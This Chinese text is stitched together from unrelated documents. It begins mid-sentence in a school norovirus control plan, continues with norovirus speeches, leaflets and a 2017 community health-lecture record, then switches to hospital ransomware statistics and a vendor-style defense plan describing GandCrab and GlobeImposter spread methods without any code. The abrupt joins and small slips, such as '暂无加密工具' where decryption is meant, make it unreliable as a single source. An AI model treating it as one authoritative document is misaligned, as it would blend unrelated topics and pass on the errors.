提供足够的水龙头、肥皂、洗手液等设施设备供师生洗手用。配备足够口罩、手套、消毒剂等,确保师生身体健康。 （四）加强健康教育,提高师生和家长的自我防护意识和能力。（责任人:） 全校开展一次预防诺如病毒知识讲座;通过致家长的一封信等方式告知家长注意饮食卫生。教育学生养成良好的个人卫生习惯,不喝生水,不吃生冷食品和未煮熟煮透的食物,尤其是禁止生食贝类等水产品,防止疾病通过食物饮水传播注意劳逸结合,保证充足的睡眠时间,保证每天有2小时户外体育锻炼,提高师生的自我防护意识和增强自身抗病能力。 （五）加强校园周边卫生巡查及报告（责任人:） 加强校园周边卫生巡查,发现校外卫生死角和流动摆卖食品的,立即与村干部和相关部门联系,并教育学生不购买流动摊贩卖的食品。 （六）加强各班级协管力度（责任人:） 各班教师在教学中要随时关注学生的身体健康状况,一旦发现学生有发热、头痛、呕吐、腹泻等症状,要及时报告政教处,班主任根据情况程度及时通知家长送医,共同做好防控工作。 三、预防与控制传染病应急预案 1.学生或教职工一旦出现诺如病毒、禽流感、风疹、流脑、麻疹、流感等传染性疾病,及时就医并向学校请假,不得带病上学、上班。经医院诊断排除传染病后才能回校上课、上班。 2.学生或教职工在校内出现传染病,及时组建处理病情的领导小组,在领导小组成员的统一安排下,要求传染病者立即戴防护口罩、手套,到学校隔离室休息,并由管理人员立即通知送医,需转医院治疗的立即转传染病医院。学生出现传染病症状时,班主任立即通知其家长,由家长陪同去医院,家长不能到校的,由班主任老师护送去医院。如果是本校教职工出现传染病,也要

(完整word版)预防诺如病毒演讲稿(word文档良心出品)

敬爱的老师，亲爱的同学们： 大家好！当前正值春季，是各类传染性疾病的多发季节，为此我们要积极做好预防工作。所以，今天我讲话的主题是《如何预防诺如病毒》。 诺如病毒俗称肠胃流感、食物中毒或者肠胃炎。诺如病毒引起的腹泻具有发病急、传播速度快、涉及范围广等特点。可通过水源、食物、物品甚至空气传播。通常在社区、学校、人口密集的地方暴发。诺如病毒潜伏期多在24～48小时，最短12小时，最长为72小时。发病时主要表现为恶心、发热、呕吐、腹泻等等。 不过即使感染了诺如病毒也不用惊慌，一般患者3天就可以治愈，但身子比较差或者老人、小孩就容易继发其他疾病感染。秋冬季节是感染诺如病毒的高发期，应尽量避免生食水产，诺如病毒主要是由污染的水和食品传播，而贝壳类、鱼类、蔬菜沙拉都是常见的被污染食品。所以进食这些食物一定要彻底煮熟。 诺如病毒是一组杯状病毒属病毒，诺如病毒遗传高度变异，现在尚无特效的抗病毒药物。所以以对症治疗为主。患者容易腹泻、呕吐至脱水。对于严重者可以进行及时输液，以补充由于脱水失去的微量元素，纠正电解质絮乱。 因为诺如病毒易在密集人群中暴发，所以我们应该共同预防。首先要注意个人卫生，不吃生冷和未熟透的食物，尽量避免在无牌、无证的小食店用餐。减少参加大型集体活动，阻隔传播途径。最重要的是一有发病，应立刻就医，以免延误病情，并引起大规模的传播。 同学们，那我们要记住以下注意事项： 1、平时要勤洗手，并用温水搽上肥皂洗。 2、避免直接接触感染者和同感染者用餐。 3、患病期间可饮少量混有微量糖和盐的液体。 当然，我想最重要的是勤于锻炼，均衡饮食，保证充足的睡眠时间。积极参加学校开展的阳光体育活动，增强身体素质，提高我们的自身免疫能力。谢谢大家！

诺如病毒感染防治知识

诺如病毒感染防治知识 诺如病毒是急性肠胃炎最常见的病原体，该病毒基因多样且高度变异，每隔数年就会出现新变异株，人一生中可多次获得感染。诺如病毒感染通常表现为自限性疾病，预后良好。 临床特征： 最常见的症状是腹泻、呕吐、反胃、恶心和胃痛，其他包括发热、头痛和全身酸痛等。多数患者发病后1-3天即可康复。如频繁呕吐或腹泻，可导致脱水，引起严重的健康问题，尤其常见于幼小儿童、老年人和基础性疾病患者。脱水主要表现为少尿、口干、咽干、站立时感头晕目眩，在儿童中可表现为啼哭无泪或少泪、异常瞌睡或烦躁。 传播： 诺如病毒传染性强，所有人群均易感。病人发病前至康复后2周，均可在粪便中检到诺如病毒，但患病期和康复后三天内是传染性最强的时期。通常通过以下途径获得感染： ⑴食用或饮用被诺如病毒污染的食物或水； ⑵触摸被诺如病毒污染的物体或表面，然后将手指放入口中； ⑶接触过诺如病毒感染患者，如照顾患者、与患者分享食物或共用餐具。 诺如病毒在密闭场所中（如托幼机构、幼儿园、学校、养老院、游船等）传播速度快，易引起暴发。 治疗： 尚无特异的抗病毒药物。患者应补充足够的水分以预防脱水。轻度脱水时，运动饮料或其他饮品（不含咖啡因或酒精）可起到一定的补水效果，但不能补充重要的营养成分和矿物质，因此，在药店购买口服补水溶液是最有效的治疗方法。严重脱水时应及时住院输液治疗。 预防： ⑴注意洗手卫生，用肥皂和清水认真洗手，尤其在如厕和更换尿布后，以及每次进食、准备和加工食物前。 ⑵水果和蔬菜食用前应认真清洗，牡蛎和其他贝类海产品应深度加工后食用。诺如病毒抵抗力较强，在60℃高温或经快速汽蒸仍可存活。

⑶诺如病毒感染儿童应远离厨房或食物加工场所。 ⑷诺如病毒感染病人患病期至康复后3天内不能准备加工食物或为其他患者陪护。 ⑸及时用含氯漂白剂或其他有效消毒剂清洗消毒被患者呕吐物或粪便污染的表面，立即脱掉和清洗被污染的衣物或床单等，清洗时应戴上橡胶或一次性手套，并在清洗后认真洗手。

2017年第三期诺如病毒防治知识讲座

基本公共卫生服务健康教育知识讲义 健康教育知识讲座 第三期 街道社区卫生服务中心 2017年3月

健康教育活动记录表 填表人（签字）：王永林负责人（签字）：滕斌 填表时间：2017年3月6日

健康教育讲座通知 中心各科室、村卫生室： 进入春节，气温忽冷忽热，肠道传染病病原菌生长繁殖开始活跃，尤其儿童要注意预防诺如病毒及手足口病等肠道疾病。麻疹、流行性腮腺炎等疾病也容易高发，需注意预防。为此我中心将在3月6日下午在街道中心小学举办一次以诺如病毒为主及手足口、肠道预防知识讲座，讲座容：诺如病毒的发病、传播途径、预防方法。在预防方面应该做怎样的防护措施。 时间：于2017年3月6日下午3时 地点：街道中心小学 主题：诺如病毒预防知识讲座 主讲人：王刚 咨询：0 街道社区卫生服务中心 二○一七年三月六日

防控诺如病毒感染性腹泻知识宣传 一、什么是诺如病毒？对人体有何危害？ 诺如病毒（又称诺瓦克病毒）是冬春季等寒冷季节感染性腹泻的主要原因，易在幼托机构、学校等集体单位的密闭场所集中暴发。人体感染后可引起以呕吐、腹泻等症状为主的急性发病，病程一般为2～3天。 二、诺如病毒感染性腹泻主要临床表现有什么 诺如病毒感染性腹泻潜伏期多在24～48小时，最短12小时，最长72小时。感染者发病突然，主要症状为呕吐和腹泻，可伴有恶心、发热和腹痛。儿童患者呕吐普遍，成人患者腹泻为多，24小时腹泻4～8次，粪便为稀水便或水样便，无粘液脓血。大便常规镜检WBC<10/HP，未见红细胞。原发感染患者的呕吐症状明显多于续发感染者，有些感染者仅表现出呕吐症状。此外，有些感染者也可有头痛、寒颤和肌肉痛等症状，严重者可出现脱水症状。 三、诺如病毒可通过什么途径传播？ 诺如病毒可通过污染的食品、饮用水、密切接触病人及其污染的物品或表面等途径传播，也可因病人呕吐物、排泄物处理不当使病毒播散至空气中传播。 四、如何防控诺如病毒感染性腹泻？ 1、饭前便后勤洗手，注意个人清洁卫生。 2、生熟食品分开，避免交叉污染。 3、食物彻底加热烧熟，不食用生食品。 4、餐具和接触即食食品的工（用）具要清洗、消毒。 5、病人的呕吐物、排泄物要及时掩闭覆盖，病人吐泻物和接触的场所物品（如教室、宿舍、校车、厕所、衣物、地板、桌椅、餐厨具、污水等）要严格消毒，并开窗通风。

诺如病毒预防措施

诺如病毒预防措施 诺如病毒是急性肠胃炎最常见的病原体，该病毒基因多样且高度变异，每隔数年就会出现新变异株，人一生中可多次获得感染。诺如病毒感染通常表现为自限性疾病，预后良好。 一、临床特征： 最常见的症状是腹泻、呕吐、反胃、恶心和胃痛，其他包括发热、头痛和全身酸痛等。多数患者发病后1-3天即可康复。如频繁呕吐或腹泻，可导致脱水，引起严重的健康问题，尤其常见于幼小儿童、老年人和基础性疾病患者。脱水主要表现为少尿、口干、咽干、站立时感头晕目眩。 二、传播：诺如病毒传染性强，所有人群均易感。病人发病前至康复后2周，均可在粪便中检到诺如病毒，但患病期和康复后三天内是传染性最强的时期。通常通过以下途径获得感染： 1、食用或饮用被诺如病毒污染的食物或水； 2、触摸被诺如病毒污染的物体或表面，然后将手指放入口中； 3、接触过诺如病毒感染患者，如照顾患者、与患者分享食物或共用餐具。 三、预防： 1、加强宣传教育。利用各种形式（广播、宣传栏、标语等）正面宣传诺如病毒的防病知识及诺如病毒的发病症状和预防措施等，增强幼儿及家长的防控意识，引导教育幼儿养成良好的卫生行为习惯，做到“勤洗手、喝开水、吃熟食、勤通风、晒衣被”等。 2、落实晨午检制度。做好记录，晨检内容包括：了解清楚因病缺勤学生的症状及治疗情况。 到园幼儿中若发现有异常及发热者（包括未到人员）做好登记，通知其家长，立即送医院诊治，并停止入园，第一时间上报疾控中心、及教育局。 3、落实消毒制度。对户外大型玩具、日常用品、门把手、桌面等用消毒液进行消毒处理，清除卫生死角，经常保持通风换气，做好消毒工作，并有消毒记录，包括：消毒时间、消毒部位、消毒方式、方法等。 4、落实隔离制度。如果发现有疑似病例要严格隔离，切断传染源的原发地，班主任立即通知家长，妥善安排医院就诊，同时上报，并做好患者所在班级其他幼儿的隔离保护，等候防疫部门专家前来检查诊治，并做好幼儿家长的安抚工作，避免过度恐慌，严格控制疫情蔓延。 5、落实零报告制度各班级实行零报告制度“有情况报情况、无情况报平安”，有情况一定要有文字说明，各班级确定专人负责报告，不得瞒报、漏报。如出现疑似诺如病毒症状要及时向学校报告。 6、责任追究制度。如有漏报、瞒报、防控措施不得力者，或在防控工作中出现渎职、懈怠，人为引起传染病在幼儿园中大面积流行的，将追究责任。 幼儿园

医院大数据安全分析与勒索病毒防护方案

医院大数据安全分析与勒索病毒防护方案

目录 Contents 01医院信息安全现状 02大数据安全分析 03勒索病毒防护 04用户案例

01医院信息安全现状

内蒙古 新疆 甘肃四川 辽宁 陕西河南湖南 山西北京河北山东 江苏 浙江 上海广东 湖北重庆江西 福建 吉林黑龙江 西藏 安徽 金融, 4% 教育, 7% 制造业, 7% 政府机构, 7% 医疗, 25% 对外贸易, 11% 工业企业, 17% 互联网, 16% 其他, 6% 地域分布 行业分布 2019以来全国勒索攻击态势 云南 贵州 广西 青海

由于部分医院信息系统存在安全风险，勒索病毒受利益驱使，依然是危害医院的主要安全风险之一。自去年7月以来，勒索病毒一直处于持续活跃的状态，其中8月份相对于7月勒索病毒传播有所加强。另外在全国三甲医院中，有247家医院检出了勒索病毒，以广东、湖北、江苏等地区检出勒索病毒最多。 ... ... 其中，被勒索病毒攻击的操作系统主要以Windows 7为主，Windows 10次之，以及停止更新的Windows XP。对此报告指出，当前没有及时更新操作系统的医疗机构仍占有一定的比例，这极有可能会为医疗业务带来极大的安全隐患。

以十二生肖作为后缀，“狗”生肖尚未出现 GlobeImposter 勒索病毒家族：2017年出现，2018年8月 份演进为V3.0版本。整体特点如下: 加密方法：采用RSA 和AES 两种加密算法的结合。----无法破解！主要的传播方式:扫描渗透+远程桌面登录爆破。----粗暴实用！解密办法：暂无公开的破解方法。V3.0版本特点如下： 1、将加密文件的后缀改成动物名称+4444的样子。 2、当加密完成后，除了清除远程桌面登录信息，还添加了自删除的功能，让追溯分析难度更高。 为什么勒索病毒总是攻击医院？ 成本低、来钱快！

新型勒索病毒的整体安全检测防护解决方案V2.0

新型勒索病毒的整体安全检测防护解决方案 一．事件概况 ●行业内网爆发勒索病毒变种 今年2月份起，医院、政府等行业爆发大规模信息勒索病毒感染事件，包括GandCrab V5.2、Globelmposter V3.0等，受影响的系统和数据库文件被加密勒索。黑客主要是通过钓鱼邮件、漏洞利用、恶意程序捆绑等方式进入内部网络，之后通过SMB漏洞攻击、RDP（windows系统远程桌面协议）口令爆破等形式大规模感染整个网络，导致终端、业务系统、数据库等被加密勒索，全国大部分省份相关单位都受到影响。 ●新型变种Globelmposter V3.0 Globelmposter勒索病毒的安全威胁热度一直居高不下。本次爆发的Globelmposter V3.0勒索病毒变种攻击手法非常丰富，可以通过社会工程、RDP爆破、恶意软件捆绑等方式进行传播其加密文件为*4444扩展名，采用RSA2048算法加密文件，目前该病毒样本加密的文件暂无解密工具，在被加密的目录下生成HOW_TO_BACK_FILES的txt文件，显示受害者的个人ID 序列号及黑客的联系方式等。 ●新型变种GandCrab V5.2 GandCrab 勒索病毒变种可绕过杀毒软件的检测，通过永恒之蓝MS17-010漏洞、共享文件服务、远程桌面服务（RDP）弱口令等方式在内网进行传播，随机生成后缀名对系统重要数据和文件进行加密，目前暂无加密工具 二．由勒索病毒反思网络安全建设 勒索病毒并非APT攻击，仅仅是病毒攻击行为，并不是不可防御的。并且，微软在17年就已经发布了SMB 相关漏洞的补丁，用户有足够的时间做好预防工作，为什么还有大量用户受影响？并且其中还包括一些行业的与互联网隔离的专网，除了在口令安全、高风险端口禁止对外开放等方面的安全意识需要提升之外，主要的原因还有以下几点： 1）大量用户缺乏全过程保护的安全体系 这起事件并非APT攻击或0DAY攻击，大部分用户的安全建设仅仅是在事中堆叠防御设备，缺乏事前风险预知的能力，使其没有提前部署好安全防护手段；在威胁爆发后，又没有持续检测和响应的能力，使得这些客户在事件爆发前没有预防手段、爆发中没有防御措施、爆发后没有及时检测和解决问题的办法。 2）忽视了内部局域网、专网和数据中心的安全防护 经过这段时间的响应，我们发现很多客户的威胁是与互联网相对隔离的内部网络中泛滥。比如专网、内网、数据中心，这些区域过去被用户认为是相对安全的区域，很多客户在这些区域仅仅部署了传统防火墙进行防护。但勒索病毒感染内部网络的途径很多，比如U盘等存储介质、比如社会工程学，再或者是与DMZ间接相连的网络都可能成为来源。 3）过于复杂的安全体系，没有发挥应有作用